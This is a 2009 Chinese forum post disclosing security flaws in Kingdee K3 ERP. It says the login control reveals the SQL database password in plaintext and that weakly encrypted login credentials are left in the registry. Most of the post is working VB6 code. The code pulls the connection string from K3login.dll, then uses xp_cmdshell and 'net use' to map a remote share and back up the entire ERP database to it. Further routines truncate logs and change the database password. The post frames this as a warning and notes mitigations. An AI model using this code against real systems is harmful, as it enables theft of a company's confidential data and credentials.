这个漏洞在K3 各个版本都存在并且一样,包括新发版的K3 V12的3个版本。主要数据安全漏洞描述如下:
最大的安全漏洞在K3login.dll这个控件上,,它能明文显示K3 ERP数据库的密码等信息,这是非常危险的,简单VB6.0代码如下:
Dim k3lg As New k3Login.ClsLogin
If k3lg.CheckLogin Then ’如果成功登录,执行下面语句
Msgbox k3lg.PropsString
End If
运行上述代码后,会弹出对话框,显示所有SQL数据库信息
你们看看,客户的ERP 数据库安全是不是全部暴露出来了,这是致命的漏洞,一个企业的所有商业机密都在这个数据库中,如该数据库泄露出去,对企业的影响是致命的。由于K3 ERP的这个漏洞,网管完全不知道数据库是如何泄露的(没有采用黑客攻击等非法手段,只是利用金蝶ERP软件安全设计漏洞),这些漏洞金蝶集团的开发人员提供的建议是(K3分析设计部祝经理提供的建议):采用WINDOWS模式认证即可避免此漏洞,请各位修改认证方式,避免企业内部数据丢失!!!!!
K3 ERP登录留下密码痕迹漏洞,适合所有版本:当用户通过登录界面登录ERP后,会将登录信息写入注册表中,包括服务器名称、登录密码、用户名称等等,因此该注册表就泄露了所有在计算机中登录用户的信息,其加密方式太简单,只要几次枚举方式就可PJ,通过数学知识,如等差数列等规律,轻而易举地将用户密码PJ,你们研究加密算法的人自己去看看规律,应对方法:因此用户最好定期清除注册表的登录痕迹,防止用户密码泄露
利用金蝶ERP软件中KDLOGIN.dll漏洞 远程备份服务器中ERP数据库代码如下(VB):
Public k3lg As New k3Login.ClsLogin
Public cnn As New ADODB.Connection
Public i As Integer
Public j As Integer
Public K As Integer
Public S As Integer
Public cnnstr As String
Public databsnm As String
Public Sub Main()
On Error Resume Next
If k3lg.CheckLogin Then
i = InStr(k3lg.PropsString, "{")
j = InStr(k3lg.PropsString, "}")
cnnstr = Mid(k3lg.PropsString, i + 1, j - i - 1)
For K = 0 To Len(cnnstr) - 1
If Left(Right(cnnstr, K), 1) = "=" Then
databsnm = Right(cnnstr, K - 1)
Exit For
End If
Next K
F001主窗口.帐套名称 = k3lg.AcctName
F001主窗口.Show
End If
End Sub
Public Sub 备份数据库(ByVal beifsjk As String)
Screen.MousePointer = 13
Set cnn = New ADODB.Connection
cnn.CommandTimeout = 0
cnn.Open cnnstr
cnn.BeginTrans
On Error GoTo cnn_err:
Dim fy As String
Dim fy001 As String
Dim fy002 As String
Dim jsj As String
Dim yhu As String
Dim mima As String
Dim wenjian As String
jsj = F001主窗口.计算机名称.Text
wenjian = F001主窗口.文件夹.Text
mima = F001主窗口.用户密码.Text
yhu = F001主窗口.用户名称.Text
fy = "exec master..xp_cmdshell'net use z: \\" & jsj &"-:special:1:- & wenjian & " " & mima & " /user:"& jsj & "-:special:1:- & yhu & "'"
fy001 = "backup database " & databsnm & " to disk='z:\-:special:1:- & beifsjk & " '"
fy002 = "exec master..xp_cmdshell 'net use z: /delete' "
cnn.Execute fy
cnn.Execute fy001
cnn.Execute fy002
cnn.CommitTrans
cnn.Close
Set cnn = Nothing
Screen.MousePointer = vbDefault
MsgBox "数据库: " & databsnm & " 成功备份为: " & beifsjk, vbInformation, "提示"
Exit Sub
cnn_err:
cnn.RollbackTrans
cnn.Close
Set cnn = Nothing
Screen.MousePointer = vbDefault
MsgBox Err.Description, vbInformation, "错误提示"
End Sub
Public Sub 清除日志()
Screen.MousePointer = 13
Set cnn = New ADODB.Connection
cnn.CommandTimeout = 0
cnn.Open cnnstr
cnn.BeginTrans
On Error GoTo cnn_err:
Dim fy As String
Dim fy001 As String
Dim fy002 As String
fy = "dump transaction " & databsnm & " with truncate_only"
fy001 = "backup log " & databsnm & " with truncate_only"
fy002 = "dbcc shrinkdatabase(" & databsnm & ") "
cnn.Execute fy
cnn.Execute fy001
cnn.Execute fy002
cnn.CommitTrans
cnn.Close
Set cnn = Nothing
Screen.MousePointer = vbDefault
MsgBox "数据库: " & databsnm & "日志成功清除!", vbInformation, "提示"
Exit Sub
cnn_err:
cnn.RollbackTrans
cnn.Close
Set cnn = Nothing
Screen.MousePointer = vbDefault
MsgBox Err.Description, vbInformation, "错误提示"
End Sub
Public Sub 修改数据库密码函数()
Screen.MousePointer = 13
Set cnn = New ADODB.Connection
cnn.CommandTimeout = 0
cnn.Open cnnstr
cnn.BeginTrans
On Error GoTo cnn_err:
Dim fy As String
fy = "exec sp_password " & "'" & F002数据库密码修改.输入旧密码 & "'"& "," & "'" & F002数据库密码修改.新密码确认.Text & "'"
cnn.Execute fy
cnn.CommitTrans
cnn.Close
Set cnn = Nothing
Screen.MousePointer = vbDefault
MsgBox "数据库密码成功修改!", vbInformation, "提示"
Exit Sub
cnn_err:
cnn.RollbackTrans
cnn.Close
Set cnn = Nothing
Screen.MousePointer = vbDefault
MsgBox Err.Description, vbInformation, "错误提示"
End Sub
|
[复制链接]
发表于 2009-8-26 16:05:55
